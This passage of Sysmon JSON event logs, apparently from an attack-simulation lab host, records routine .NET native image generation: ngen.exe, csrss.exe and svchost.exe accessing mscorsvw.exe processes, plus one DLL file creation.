C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010D0011000}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7388,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010D0011000}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010D0011000}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7389,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.418\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010D0011000}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.418","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010D0011000}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.465\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001079700F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.465","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001079700F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.465\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-001079700F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.465","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001079700F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.481\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001045051000}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.481","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001045051000}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:05.668\r\nProcessGuid: {A837DB8D-04A9-5F25-0000-001045051000}\r\nProcessId: 4276\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10b4-0\\System.ComponentModel.DataAnnotations.dll\r\nCreationUtcTime: 2020-08-01 05:59:05.668","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:05.668","ProcessGuid":"{A837DB8D-04A9-5F25-0000-001045051000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10b4-0\\System.ComponentModel.DataAnnotations.dll","CreationUtcTime":"2020-08-01 05:59:05.668","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.699\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00101B740F00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.699","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00101B740F00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00101B740F00}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00101B740F00}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
